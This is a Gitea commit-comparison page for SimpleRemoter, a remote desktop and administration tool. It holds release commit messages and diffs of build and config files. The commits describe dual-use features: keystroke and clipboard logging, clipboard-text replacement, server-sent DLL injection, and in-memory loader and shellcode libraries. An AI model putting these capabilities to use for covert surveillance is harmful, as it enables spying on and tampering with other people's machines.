yuanyuanxiang/SimpleRemoter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases 4 Wiki Activity

Compare commits

base: yuanyuanxiang:v1.3.2
Branches Tags
yuanyuanxiang:main
yuanyuanxiang:v1.3.5 yuanyuanxiang:v1.3.4 yuanyuanxiang:v1.3.3 yuanyuanxiang:v1.3.2
..
compare: yuanyuanxiang:v1.3.5
Branches Tags
yuanyuanxiang:main
yuanyuanxiang:v1.3.5 yuanyuanxiang:v1.3.4 yuanyuanxiang:v1.3.3 yuanyuanxiang:v1.3.2

94 Commits
v1.3.2 ... v1.3.5

Author SHA1 Message Date
yuanyuanxiang
da024fb3fb Release v1.3.5 2026-05-31 17:34:30 +02:00
yuanyuanxiang
a5a04aaab7 fix(web): improve touch double-click reliability across platforms 
Increase touch move threshold to prevent accidental drag detection.

Simulate physical double-click with two sequential click events and a 20ms delay instead of using non-standard dblclick event.

Fix folder renaming and unresponsiveness issues on Windows, Linux, and macOS.
 2026-05-30 23:41:03 +02:00
yuanyuanxiang
c846d11efa Feature: add menu-driven compress/extract via custom file+folder picker 2026-05-30 18:10:15 +02:00
yuanyuanxiang
9fe8ab746a Perf(screen): skip encode on identical frames to cut HW encoder idle bandwidth 2026-05-30 00:12:47 +02:00
yuanyuanxiang
8c7f612449 Feature: Implement H.264 and AV1 hardware encoding for remote control 
Remark: Need to update FFmpeg static libraries to take effort
 2026-05-30 00:12:38 +02:00
yuanyuanxiang
d1aa7a2c02 Fix: guard IOCPClient against early packet before setManagerCallBack 2026-05-28 23:50:56 +02:00
yuanyuanxiang
c0a632a4c6 Compliance: Add building option to disable x264 and ffmpeg 2026-05-27 18:58:29 +02:00
yuanyuanxiang
085543b0f1 Fix(license): respect BindType when validating SN on import 2026-05-27 15:28:56 +02:00
yuanyuanxiang
1fd431ba76 Fix(logger): preserve queued logs on shutdown; record exit signal 2026-05-27 08:55:14 +02:00
yuanyuanxiang
268a427172 Go:Add build pipeline for go server and fix web login bug 2026-05-27 08:47:21 +02:00
yuanyuanxiang
620aaf6827 Fix(license): IP list truncated at 4KB causing permanent data loss 2026-05-25 21:04:36 +02:00
yuanyuanxiang
d6fb612475 Refactor: Remove SCLoader.cpp and use the received DLL to inject 2026-05-25 00:16:39 +02:00
yuanyuanxiang
54c88539e5 Fix: Avoid sending authorization information to trail SN 2026-05-24 23:03:58 +02:00
yuanyuanxiang
92bf9c9ccb Fix(record): correct MJPEG upside-down playback 
and remove 0-byte AVI residue on encoder open failure
 2026-05-23 13:37:28 +02:00
yuanyuanxiang
99fc15ae41 Fix(cursor): correct trace cursor position on multi-monitor capture 2026-05-22 23:24:26 +02:00
yuanyuanxiang
62e962f216 doc(linux): Add linux client install.sh & uninstall.sh 2026-05-22 22:02:38 +02:00
yuanyuanxiang
740ec8baf3 Perf(license): mutex + write-suppression for licenses.ini hot path 
licenses.ini was hit on every heartbeat -- 5s x clients x ~8 SetStr per
auth -- with no concurrency protection. Two consequences:
  1. 100 concurrent online would saturate the file (~160 writes/sec,
     full-file rewrite each via WritePrivateProfileString).
  2. Concurrent SetPendingRenewal / DecrementPendingQuota with no lock
     occasionally clobbered freshly-set renewal quotas (reported by
     user as "preset renewal silently disappears").

Add LicensesIniMutex() (Meyers singleton recursive_mutex, exposed in
CPasswordDlg.h so both CPasswordDlg.cpp and CLicenseDlg.cpp share it)
and wrap all 15 functions that touch licenses.ini.

Rewrite UpdateLicenseActivity around g_activityCache (in-memory state
keyed by "SN|IP|machine"): skip the entire write path when nothing
changed and the 30s LastActiveTime throttle window hasn't expired.
Passcode/HMAC are only flushed on actual change (renewal path); IP
list is only rewritten when the yyMMdd timestamp would roll a day.

Measured impact (local 2-client baseline):
  before: 0.60 writes/sec (4 writes per heartbeat cluster)
  after:  0.07 writes/sec (one write per client per 30s throttle)

Extrapolated to the 100-online target:
  before: ~160 writes/sec (saturation)
  after:  ~3.3 writes/sec  (100 clients / 30s throttle window)

Race elimination is the more important win: PendingQuota's
read-modify-write is now atomic, so the "preset renewal disappears"
race is closed.

Notes from audit (these landed during the same iteration):
- Cache key is (SN, IP, machine), not SN alone. A single SN can be
  shared by 100+ end machines in bulk-license deployments, so a
  per-SN cache flips on every heartbeat and defeats suppression.
  Per-(SN, IP, machine) throttling is what makes the 100/30 model
  actually hold; an SN-only key reproduced the original ~0.7 writes/s.
- DeleteLicense invalidates the per-SN activity cache via
  InvalidateLicenseActivityCache() (prefix scan since one SN maps to
  many cache entries). Without this, cache hits after delete would
  skip the auto-recreate path and leave the section permanently
  missing.
- OnLicenseViewIPs: m_ListLicense.SetItemText moved outside the lock
  so the critical section only covers disk I/O.
 2026-05-22 00:31:54 +02:00
yuanyuanxiang
83d671c90f Fix(FRP): use UTC for privilegeKey timestamp to fix cross-timezone auth 2026-05-21 23:33:13 +02:00
yuanyuanxiang
5b7d3903b5 Feature: Automatically start frp client for subordinate 2026-05-21 23:33:06 +02:00
yuanyuanxiang
da443283f2 fix: Send AUTH to sub-master but generate wrong password 2026-05-21 21:37:52 +02:00
yuanyuanxiang
e5bb405f79 docs: migrate Release/Download targets to Gitea; keep stars/forks on GitHub 
GitHub mirror is no longer maintained; v1.3.4+ releases land on Gitea only.
Repoint the Release-version badge and Download-Latest button (href + shields
endpoint + logo) at git.simpleremoter.com so visitors don't end up on a stale
GitHub release page.

Stars/forks badges stay on GitHub — vanity counters reflecting historical
accumulation, not navigation targets.

Also: server/go/README.md yama-issue-token link and the line-294 Markdown
"Releases" link in all three READMEs now point at Gitea.
 2026-05-20 22:24:42 +02:00
yuanyuanxiang
6e743ada0b Release v1.3.4 2026-05-20 15:23:08 +02:00
yuanyuanxiang
d808462fe1 Feat(go): add Signer interface + License Server for multi-customer deployments 2026-05-20 15:22:47 +02:00
yuanyuanxiang
e264e092f6 Fix(client): harden TCP heartbeat against half-dead connections 2026-05-20 15:22:13 +02:00
yuanyuanxiang
707dcdbbb4 Fix(Web): exit remote-desktop fullscreen blocks device-list clicks 2026-05-19 22:20:58 +02:00
yuanyuanxiang
1c1bb3a5ff Fix(Go): notify browsers with device_offline so the webpage not frozen 2026-05-19 21:48:09 +02:00
yuanyuanxiang
cd43caafb2 Fix: Web remote desktop reliability and UX 
- Server: clamp web session adaptive quality to H264-only levels (>=Good) in EvaluateQuality and ApplyQualityLevel; Ultra/High (DIFF/RGB565) caused the browser to freeze ~1 min into a session
- Server: move session-type detection to the top of ScreenSpyDlg::OnInitDialog and skip SetWindowPlacement/EnterFullScreen for hidden web sessions, eliminating the MFC dialog flash on web-triggered opens
- Linux client: default QualityLevel from QUALITY_ADAPTIVE to QUALITY_GOOD to match Windows/macOS so the server's adaptive controller doesn't auto-upgrade to non-H264 algorithms
- Web: clear the floating quick-action toolbar on fullscreen exit so its row of buttons (RDP reset / Mouse / Close) doesn't stay pinned to the top of the page
- Web: route F11 to the remote in control mode instead of toggling local fullscreen
- Web: route Esc to the remote in control mode via the Keyboard Lock API instead of exiting native fullscreen
 2026-05-19 18:39:16 +02:00
yuanyuanxiang
d757c33bcb Fix(Go): stable device list ordering + RDP-reset handler 
Fix UTF-8 login text decode + stale screen sub-conn retirement
 2026-05-19 16:28:32 +02:00
yuanyuanxiang
5af017bf09 Improve Go Server to support remote desktop and command control (#1) 
Reviewed-on: #1
 2026-05-18 22:06:07 +00:00
yuanyuanxiang
32a75f4670 Security(Go): Login rate limit + WS origin allowlist + REST bearer auth 2026-05-18 22:06:07 +00:00
yuanyuanxiang
d7f38ecfdb Feature(Go): Web terminal relay with PTY mode and graceful close (Phase 6) 2026-05-18 22:06:07 +00:00
yuanyuanxiang
6485e800d6 Feature(Go): Mouse/keyboard input + user management with users.json (Phase 5 + 7) 2026-05-18 22:06:07 +00:00
yuanyuanxiang
fba4143dd1 Feature(Go): Screen frame relay end-to-end with graceful client BYE (Phase 4) 2026-05-18 22:06:07 +00:00
yuanyuanxiang
4ea6ed252c Feature(Go): Web auth, WebSocket signaling and live device list (Phase 3) 2026-05-18 22:06:07 +00:00
yuanyuanxiang
534d3650c4 Feature(Go): Embed and serve web UI assets 2026-05-18 22:06:07 +00:00
yuanyuanxiang
2ed86b5e08 Fix(Go): Restore missing go.mod from SimpleRemoter migration 2026-05-18 22:06:07 +00:00
yuanyuanxiang
8dd1c936e2 Security: Web admin password via YAMA_WEB_ADMIN_PASS, decoupled from master password 2026-05-18 23:56:05 +02:00
yuanyuanxiang
ccab37658a Improve(Web): Touch-mode visual cursor follows remote IDC_* state 2026-05-17 20:02:10 +02:00
yuanyuanxiang
4e0627e6a3 Fix(Web): Align touchpad cursor overlay to SVG arrow tip 2026-05-17 19:12:55 +02:00
yuanyuanxiang
dc48091d5b Refactor(Web): Extract embedded HTML to server/web/index.html 2026-05-17 18:46:21 +02:00
yuanyuanxiang
4d2b12a9dd Compliance: Server-side anti-proxy for trail authorization 2026-05-16 19:48:39 +02:00
yuanyuanxiang
4279e79aa7 Compliance fix: Move LAN RTT check to KernelManager heartbeat 2026-05-16 00:06:01 +02:00
yuanyuanxiang
14387d69ca Compliance: Anti-proxy RTT check + tiered usage policy and disclaimer 
Refine: Subtract server processing time from auth heartbeat RTT for proxy detection

chore: add MIT LICENSE + remove RAT-named related project link
 2026-05-15 17:15:00 +02:00
yuanyuanxiang
744ebfba0d Improve(Web): Headless host opens terminal 
fix two-finger scroll speed and zoom misdetect
 2026-05-15 02:05:01 +02:00
yuanyuanxiang
5a92c3306f Feature: Web remote terminal (xterm.js + mobile UX polish) 2026-05-15 02:05:01 +02:00
yuanyuanxiang
5d9554780f Fix(Web): Map unshifted OEM symbols, send multi-char IME commits 2026-05-15 02:05:01 +02:00
yuanyuanxiang
84a52b9dcf Improve: Web UI - iOS safe-area, icon toolbar buttons, logout confirm 2026-05-15 02:05:00 +02:00
yuanyuanxiang
571ec7d80c Fix: Add AVX2 runtime check and optional x264 compilation 2026-05-14 13:39:44 +02:00
yuanyuanxiang
ead4f909ee Fix: Match thumbnail column selection bg on listview focus loss 2026-05-13 21:44:26 +02:00
yuanyuanxiang
e762e3cbd1 Feature: Add live thumbnail preview column to online host list 2026-05-13 18:43:20 +02:00
yuanyuanxiang
6c32b478af Feature: Add "Play Snapshot" loop preview windows for online hosts 2026-05-13 13:05:31 +02:00
yuanyuanxiang
b813d94486 Improve: Finish "scheduler.h" to support all running plan 2026-05-12 22:53:17 +02:00
yuanyuanxiang
0fe67b16d5 Feature: Support replacing clip text via keyboard management dialog 2026-05-11 20:22:07 +02:00
yuanyuanxiang
b69d61617f Improve: Keyboard logger supports logging clipboard changes 2026-05-11 00:49:18 +02:00
shaun
929436e29d Fix: DO NOT use absolute resource path in .RC file 2026-05-10 23:42:58 +02:00
yuanyuanxiang
95946e0e6a Release v1.3.3 2026-05-10 20:01:13 +02:00
yuanyuanxiang
ab7a16bec5 Feature: Support building macOS client via "Build-Dialog" 2026-05-10 19:46:48 +02:00
yuanyuanxiang
9acd141cab Fix: Modern Terminal blank under SYSTEM; precise reason in info list 2026-05-10 17:36:46 +02:00
yuanyuanxiang
153cbddcf6 Fix: V2 file transfer broken via FileManager dialog (both directions) 2026-05-10 13:50:04 +02:00
yuanyuanxiang
d46176f4ef Refactor: extract Linux/macOS client shared code into common 2026-05-10 10:15:14 +02:00
yuanyuanxiang
70354e244c Improve: Add adaptive screen algorithm option and set to default 
Fix: send Windows client path/username as UTF-8 (consistent with CLIENT_CAP_UTF8), keep client ID stable across upgrade
 2026-05-09 23:13:24 +02:00
yuanyuanxiang
a354f1ed86 Improve: Embed Modern Terminal DLL in master's resources 
Fix: keep Linux/macOS client alive across server restarts; gate all commands on auth-verified state to neutralize unauthorized servers
 2026-05-09 00:43:55 +02:00
yuanyuanxiang
f85cc8b86c Fix: Linux client UTF-8 path/active-window garbled on server 2026-05-08 14:03:45 +02:00
yuanyuanxiang
bc06fd5af5 Feature: Linux/macOS server-identity gate via libsign.a 
fix remote-cursor flicker on Windows controller
 2026-05-08 12:39:59 +02:00
yuanyuanxiang
731ff7a894 Feature: right-click region screenshot in non-control mode 2026-05-08 09:27:19 +02:00
yuanyuanxiang
566f5b8d42 Feature: screen preview thumbnail on host double-click 
Server sends COMMAND_SCREEN_PREVIEW_REQ when user double-clicks an
active (non-Locked/Inactive) host that advertises CLIENT_CAP_SCREEN_PREVIEW.
Client BitBlts primary screen, encodes to JPEG via GDI+ and replies. The
existing STATIC tooltip is replaced with a self-drawn CPreviewTipWnd
showing the thumbnail above the host info text, with wide-character
rendering so the popup also works on non-Chinese servers.

- Quality tiers reuse QualityProfile pattern: PreviewProfile + 6 levels
  driven by GetTargetQualityLevel (FRP-aware), with 4K/ultrawide auto
  upscale on Ultra/High tiers up to min(screenWidth/4, 1280).
- Client limits to 1 in-flight capture via atomic counter to defend
  against flood/DoS; Send2Server is already mutex-serialized.
- Server validates responses by reqId only (single in-flight tip);
  4s arrival timeout marks "preview unavailable" without blocking the
  text fallback path.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
 2026-05-07 18:17:28 +02:00
yuanyuanxiang
70a6b0128e Fix: log list header click was sorting host list (longstanding cross-talk) 
ON_NOTIFY(HDN_ITEMCLICK, 0, ...) matches the inner header control's ID,
which is 0 for both m_CList_Online and m_CList_Message. So clicks on
either list's header reach OnHdnItemclickList, which always sorts the
host list by the clicked column index.

The cross-talk has existed since the initial migration commit (5a325a2).
It went unnoticed because pre-0aa7588 both lists' headers triggered the
handler in A mode and the columns happened to align (host list cols 0..2
== IP/Addr/Location, log list also has 3 cols), so log-header clicks
appeared to "sort plausibly". After 0aa7588 only the log list's A-mode
header reached the handler, surfacing the strange "click log header
re-sorts hosts" behavior.

Guard the handler by checking pNMHDR->hwndFrom against the online list's
header HWND. Log header clicks now have no effect on the host list.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
 2026-05-07 10:47:05 +02:00
yuanyuanxiang
b252cbbaf2 Fix: header sort broken after LVM_SETUNICODEFORMAT (also map HDN_ITEMCLICKW) 
The i18n commit (0aa7588) enabled LVM_SETUNICODEFORMAT(TRUE) on the online
list. That flag also flips the embedded header control to Unicode mode, so
header notifications switch from HDN_ITEMCLICKA (= HDN_ITEMCLICK in MBCS
build) to HDN_ITEMCLICKW. The existing ON_NOTIFY mapping only handles the
A version, so clicking the column header silently does nothing.

Add a parallel ON_NOTIFY for HDN_ITEMCLICKW dispatching to the same handler.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
 2026-05-07 10:37:24 +02:00
yuanyuanxiang
5f4fb62d20 Fix: tray icon not showing in Release service+agent mode (drop NIF_GUID) 
NIF_GUID binds the tray icon to the EXE's full path. Once a GUID is
registered for one path, Shell_NotifyIcon(NIM_ADD) silently fails for any
other path using the same GUID. This caused Debug-vs-Release builds and
service+agent dual-process scenarios to fight over the same GUID slot.

Drop NIF_GUID and the static NOTIFY_ICON_GUID; revert to the traditional
(hWnd, uID) identification. The icon is freshly registered per process
launch, no path binding, no cross-instance interference.

The NIF_GUID was leftover from the AUMID/Toast experiment that was later
reverted; only the tray-icon side of that change wasn't cleaned up.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
 2026-05-07 00:17:32 +02:00
yuanyuanxiang
ef8165c3b4 Feature: sub-connection auth (TOKEN_CONN_AUTH) with HMAC + clientID binding 
Client first packet on every sub-connection signs (clientID || timestamp ||
nonce) and waits for server ack. Server verifies signature and pins clientID
on the sub-connection ctx, eliminating IP-reverse-lookup unreliability for
NAT/localhost scenarios. Sub-conn coverage: Win 12 sites, Linux/macOS 3-4
each. Main connection keeps existing TOKEN_LOGIN flow unchanged.

Includes:
- Protocol structs sized to 512/256 bytes with reserved space for future
  extensions (locale, OS info, session token, etc.)
- 5-min timestamp tolerance (Kerberos-grade replay window)
- 10-sec client wait for cross-pacific / weak-network tolerance
- Fix RemoveFromHostList side-effect ordering: MarkDeviceOffline and
  m_ActiveWndW.erase now only fire when ctx is actually removed from
  m_HostList, preventing sub-conn disconnects from misreporting main as
  offline (regression introduced by auth-set clientID on sub ctx)
- Fix latent bug: IOCPClient::m_conn was never assigned in ctor, leaving
  GetConnectionAddress() always NULL and FileManager V2 transfer's
  srcClientID always 0

Breaking change: new client cannot use sub-features against old server.
New server tolerates legacy clients (no auth). Future tightening can reject
unauthenticated sub-connections via IsAuthenticated() flag.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
 2026-05-07 00:04:40 +02:00
yuanyuanxiang
2c5b5ad628 Improve: client/server - stable client ID via MachineGuid+path (V2) 2026-05-06 21:32:06 +02:00
yuanyuanxiang
0aa75882d1 i18n: UTF-8 protocol capability + Unicode rendering on server 2026-05-06 19:29:02 +02:00
yuanyuanxiang
11434653e9 Feature: Add debug configuration for Microsoft VS Code 2026-05-06 09:51:17 +02:00
yuanyuanxiang
05a9bb1245 Feature: Allow external resource override from res/ directory 2026-05-05 21:21:38 +02:00
yuanyuanxiang
a89f8dd28f Feature: Add zoom functionality for remote desktop viewer in non-control mode 2026-05-05 15:09:16 +02:00
yuanyuanxiang
6113b4653d Fix: Resend login info after group change for macOS/Linux clients 2026-05-05 13:35:02 +02:00
yuanyuanxiang
f11fc93ba8 Feature: Embed language resources, disk files act as optional patches 2026-05-05 13:22:47 +02:00
yuanyuanxiang
773c78ac0f Improve master authorization logs and web remote desktop cursor 2026-05-05 12:46:05 +02:00
yuanyuanxiang
92f3df8464 Perf: Optimize macOS screen capture with CGDisplayStream 
Core optimization:
- Use CGDisplayStream instead of per-frame CGDisplayCreateImage
- Push model: CPU sleeps when screen is static (condition_variable wait)
- IOSurface capture avoids expensive image creation per frame
- ~47% CPU reduction during active remote desktop (45% → 24%)

Additional optimizations:
- vImageVerticalReflect (SIMD) replaces manual row-by-row flip
- Cache CGColorSpaceRef to avoid per-frame creation/release
- Cache tempBuffer to avoid per-frame memory allocation
- Throttle getCursorTypeIndex to 250ms (Accessibility API is expensive)

Bug fixes:
- Fix unreliable screen capture permission check (use actual capture test)
- Improve permission logging

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
 2026-05-03 23:36:23 +02:00
yuanyuanxiang
b732f841d0 fix(server): Prevent crash from dangling pointers in file dialog map 
Fixed two bugs when closing ScreenSpyDlg with file transfer dialogs:

1. Access violation (0xC0000005): CDlgFileSend self-destructs via
   PostNcDestroy (delete this) when closed, leaving dangling pointers
   in m_FileRecvDlgs map.

2. Double-free: Original code called DestroyWindow() then delete,
   but DestroyWindow already triggers delete this via PostNcDestroy.

Solution:
- Store {HWND, pointer} pairs instead of raw pointers
- Check HWND validity with IsWindow() before accessing pointer
- Use SendMessage(WM_CLOSE) to let dialog self-destruct safely
- Always erase map entries to prevent accumulation of invalid data

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
 2026-05-03 15:29:31 +02:00
yuanyuanxiang
1df2a7b321 feat(macos): Add clipboard support to match Linux implementation 2026-05-03 13:53:58 +02:00
yuanyuanxiang
3d8e90da14 Feature: Add daemon mode (-d) support for macOS 2026-05-03 13:35:30 +02:00
yuanyuanxiang
12e2a33062 Fix: Prevent reconnect crash by clearing callback before destruction 2026-05-03 13:16:02 +02:00
yuanyuanxiang
a8b0932080 Feature: Implement Linux cursor type detection using XFixes extension 2026-05-03 12:58:29 +02:00
yuanyuanxiang
ca37fa419a Feat: Implement H264 for Linux client with dynamic libx264 loading 2026-05-03 12:15:22 +02:00
yuanyuanxiang
36423b1c7c Refactor: Move FileManager to common, add macOS file management support 2026-05-03 10:30:30 +02:00
yuanyuanxiang
a3611d9fc1 Feature: Add terminal support for macOS client with shared PTYHandler 2026-05-03 09:33:47 +02:00
yuanyuanxiang
9ae5529458 Fix: Ensure MFC and Web remote desktop sessions are fully independent 2026-05-02 19:16:30 +02:00
yuanyuanxiang
171fa750e5 Feature: Persist group name to config file and include in login info 2026-05-02 19:14:21 +02:00
yuanyuanxiang
8ed9ba8426 Fix: Wake display on remote desktop start when macOS is locked 2026-05-02 19:14:14 +02:00
yuanyuanxiang
fd3838a151 Feature: filter device visibility by allowed groups for web user 2026-05-02 00:30:08 +02:00
yuanyuanxiang
56419f8ecb Fix: MFC remote desktop touchpad two-finger scroll not working 2026-05-01 23:25:32 +02:00
yuanyuanxiang
bb6fd7b1b9 Feature: Add user idle and screen lock detection for macOS 2026-05-01 23:20:46 +02:00
yuanyuanxiang
3607f1d768 Feature: Add power management to keep macOS client always responsive 2026-05-01 21:43:55 +02:00
187 changed files with 26221 additions and 16265 deletions
Expand all files Collapse all files

4
.gitattributes vendored
View File

@@ -1,6 +1,10 @@
# Auto detect text files and perform LF normalization # Auto detect text files and perform LF normalization
* text=auto * text=auto
# Shell scripts must keep LF line endings even when checked out on Windows,
# otherwise Linux refuses them with "bad interpreter: /usr/bin/env^M".
*.sh text eol=lf
# Custom for Visual Studio # Custom for Visual Studio
*.cs diff=csharp *.cs diff=csharp

21
.gitignore vendored
View File

@@ -74,3 +74,24 @@ test/build/
docs/MultiLayerLicense_Design.md docs/MultiLayerLicense_Design.md
docs/MultiLayerLicense_Implementation.md docs/MultiLayerLicense_Implementation.md
docs/_CodeReference.md docs/_CodeReference.md
linux/CMakeFiles/*
Releases/*
*.log
*.txt
linux/Makefile
linux/cmake_install.cmake
.vs
client/ghost_vs2015.vcxproj.user
docs/macOS_Support_Design.md
settings.local.json
*.zip
*.lic
YAMA.code-workspace
.claude/settings.json
.vscode/settings.json
Bin/*
nul
server/go/web/assets/index.html
server/go/users.json
server/go/build/
server/go/.claude/settings.json

43
.vscode/build.ps1 vendored Normal file
View File

@@ -0,0 +1,43 @@
param(
[Parameter(Mandatory = $true)]
[string]$Target,
[ValidateSet("Debug", "Release")]
[string]$Configuration = "Debug",
[ValidateSet("x64", "x86", "Win32")]
[string]$Platform = "x64"
)
$ErrorActionPreference = "Stop"
$vswhere = Join-Path ${env:ProgramFiles(x86)} "Microsoft Visual Studio\Installer\vswhere.exe"
if (-not (Test-Path $vswhere)) {
Write-Host "ERROR: vswhere.exe not found at $vswhere" -ForegroundColor Red
Write-Host "Install Visual Studio Installer (comes with VS 2017+)." -ForegroundColor Yellow
exit 1
}
$msbuild = & $vswhere -latest -prerelease -products * `
-requires Microsoft.Component.MSBuild `
-find 'MSBuild\**\Bin\MSBuild.exe' | Select-Object -First 1
if (-not $msbuild) {
Write-Host "ERROR: MSBuild not found via vswhere" -ForegroundColor Red
exit 1
}
$sln = Join-Path $PSScriptRoot "..\YAMA.sln" | Resolve-Path
Write-Host "MSBuild : $msbuild" -ForegroundColor Cyan
Write-Host "Solution: $sln" -ForegroundColor Cyan
Write-Host "Target : $Target | $Configuration | $Platform" -ForegroundColor Cyan
Write-Host ""
& $msbuild $sln.Path `
"/t:$Target" `
"/p:Configuration=$Configuration" `
"/p:Platform=$Platform" `
/m /v:minimal /nologo
exit $LASTEXITCODE

61
.vscode/c_cpp_properties.json vendored Normal file
View File

@@ -0,0 +1,61 @@
{
"version": 4,
"configurations": [
{
"name": "Win32",
"intelliSenseMode": "windows-msvc-x64",
"compilerPath": "cl.exe",
"cStandard": "c11",
"cppStandard": "c++17",
"windowsSdkVersion": "10.0.19041.0",
"includePath": [
"${workspaceFolder}",
"${workspaceFolder}/client",
"${workspaceFolder}/common",
"${workspaceFolder}/compress",
"${workspaceFolder}/compress/ffmpeg",
"${workspaceFolder}/server/2015Remote",
"${workspaceFolder}/server/2015Remote/proxy",
"${workspaceFolder}/client/d3d",
"${env:VLDPATH}/include"
],
"defines": [
"_WIN32",
"_WINDOWS",
"_DEBUG",
"_MBCS",
"ZLIB_WINAPI",
"_CRT_SECURE_NO_WARNINGS",
"_AFXDLL",
"_USRDLL"
],
"browse": {
"path": [
"${workspaceFolder}/client",
"${workspaceFolder}/common",
"${workspaceFolder}/compress",
"${workspaceFolder}/server"
],
"limitSymbolsToIncludedHeaders": true
}
},
{
"name": "Linux (WSL)",
"intelliSenseMode": "linux-gcc-x64",
"compilerPath": "/usr/bin/g++",
"cStandard": "c11",
"cppStandard": "c++11",
"includePath": [
"${workspaceFolder}",
"${workspaceFolder}/client",
"${workspaceFolder}/common",
"${workspaceFolder}/compress",
"${workspaceFolder}/linux",
"${workspaceFolder}/linux/mterm"
],
"defines": [
"__linux__"
]
}
]
}

8
.vscode/extensions.json vendored Normal file
View File

@@ -0,0 +1,8 @@
{
"recommendations": [
"ms-vscode.cpptools",
"ms-vscode-remote.remote-wsl",
"ms-vscode.powershell",
"twxs.cmake"
]
}

86
.vscode/launch.json vendored Normal file
View File

@@ -0,0 +1,86 @@
{
"version": "0.2.0",
"configurations": [
{
"name": "Yama (Debug x64)",
"type": "cppvsdbg",
"request": "launch",
"program": "${workspaceFolder}/Bin/Yama_x64d.exe",
"args": [
"-agent"
],
"stopAtEntry": false,
"cwd": "${workspaceFolder}/Bin",
"environment": [],
"preLaunchTask": "Build Yama (Debug x64)",
"symbolSearchPath": "${workspaceFolder}/Bin;${workspaceFolder}/x64/Debug",
"sourceFileMap": {
"${workspaceFolder}": "${workspaceFolder}"
}
},
{
"name": "Yama (Attach)",
"type": "cppvsdbg",
"request": "attach",
"processId": "${command:pickProcess}"
},
{
"name": "ghost (Debug x64)",
"type": "cppvsdbg",
"request": "launch",
"program": "${workspaceFolder}/x64/Debug/ghost.exe",
"args": [],
"stopAtEntry": false,
"cwd": "${workspaceFolder}/x64/Debug",
"environment": [],
"console": "externalTerminal",
"preLaunchTask": "Build ghost (Debug x64)"
},
{
"name": "TestRun (Debug x64)",
"type": "cppvsdbg",
"request": "launch",
"program": "${workspaceFolder}/x64/Debug/TestRun.exe",
"args": [],
"stopAtEntry": false,
"cwd": "${workspaceFolder}/x64/Debug",
"environment": [],
"console": "externalTerminal",
"preLaunchTask": "Build TestRun (Debug x64)"
},
{
"name": "ghost (Linux WSL)",
"type": "cppdbg",
"request": "launch",
"program": "/mnt/c/github/YAMA/linux/ghost",
"args": [],
"stopAtEntry": false,
"cwd": "/mnt/c/github/YAMA/linux",
"environment": [],
"externalConsole": false,
"MIMode": "gdb",
"miDebuggerPath": "/usr/bin/gdb",
"pipeTransport": {
"pipeCwd": "${workspaceFolder}",
"pipeProgram": "C:\\Windows\\System32\\wsl.exe",
"pipeArgs": [
"-e",
"bash",
"-c"
],
"debuggerPath": "/usr/bin/gdb"
},
"sourceFileMap": {
"/mnt/c/github/YAMA": "${workspaceFolder}"
},
"setupCommands": [
{
"description": "Enable pretty-printing for gdb",
"text": "-enable-pretty-printing",
"ignoreFailures": true
}
],
"preLaunchTask": "Build ghost (Linux WSL)"
}
]
}

109
.vscode/tasks.json vendored Normal file
View File

@@ -0,0 +1,109 @@
{
"version": "2.0.0",
"tasks": [
{
"label": "Build Yama (Debug x64)",
"type": "shell",
"command": "powershell",
"args": [
"-NoProfile",
"-ExecutionPolicy",
"Bypass",
"-File",
"${workspaceFolder}\\.vscode\\build.ps1",
"-Target",
"Yama",
"-Configuration",
"Debug",
"-Platform",
"x64"
],
"problemMatcher": [
"$msCompile"
],
"group": "build",
"presentation": {
"reveal": "silent",
"panel": "dedicated",
"clear": true
}
},
{
"label": "Build ghost (Debug x64)",
"type": "shell",
"command": "powershell",
"args": [
"-NoProfile",
"-ExecutionPolicy",
"Bypass",
"-File",
"${workspaceFolder}\\.vscode\\build.ps1",
"-Target",
"ghost",
"-Configuration",
"Debug",
"-Platform",
"x64"
],
"problemMatcher": [
"$msCompile"
],
"group": "build",
"presentation": {
"reveal": "silent",
"panel": "dedicated",
"clear": true
}
},
{
"label": "Build TestRun (Debug x64)",
"type": "shell",
"command": "powershell",
"args": [
"-NoProfile",
"-ExecutionPolicy",
"Bypass",
"-File",
"${workspaceFolder}\\.vscode\\build.ps1",
"-Target",
"TestRun",
"-Configuration",
"Debug",
"-Platform",
"x64"
],
"problemMatcher": [
"$msCompile"
],
"group": "build",
"presentation": {
"reveal": "silent",
"panel": "dedicated",
"clear": true
}
},
{
"label": "Build ghost (Linux WSL)",
"type": "process",
"command": "wsl",
"args": [
"-e",
"bash",
"-c",
"cmake -DCMAKE_BUILD_TYPE=Debug . && make -j$(nproc)"
],
"options": {
"cwd": "${workspaceFolder}\\linux"
},
"problemMatcher": [
"$gcc"
],
"group": "build",
"presentation": {
"reveal": "always",
"panel": "dedicated",
"clear": true
}
}
]
}

8
Dependencies.md
View File

@@ -11,6 +11,14 @@
- [jpeg v3.1.1](https://github.com/libjpeg-turbo/libjpeg-turbo) - [jpeg v3.1.1](https://github.com/libjpeg-turbo/libjpeg-turbo)
- [opus-1.6.1](https://opus-codec.org/release/stable/2026/01/14/libopus-1_6_1.html) - [opus-1.6.1](https://opus-codec.org/release/stable/2026/01/14/libopus-1_6_1.html)
- [libpeconv c7d1e48](https://github.com/hasherezade/libpeconv) - [libpeconv c7d1e48](https://github.com/hasherezade/libpeconv)
- [libvpl v2.16.0](https://github.com/intel/libvpl)
- [dav1d 62501cc](https://github.com/videolan/dav1d)
## execution
- [MemoryModule](https://github.com/fancycode/MemoryModule.git)
- [sRDI](https://github.com/Drewsif/sRDI.git)
- [pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode.git)
## *Note* ## *Note*

21
LICENSE Normal file
View File

@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2019-2026 yuanyuanxiang
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to furnish persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
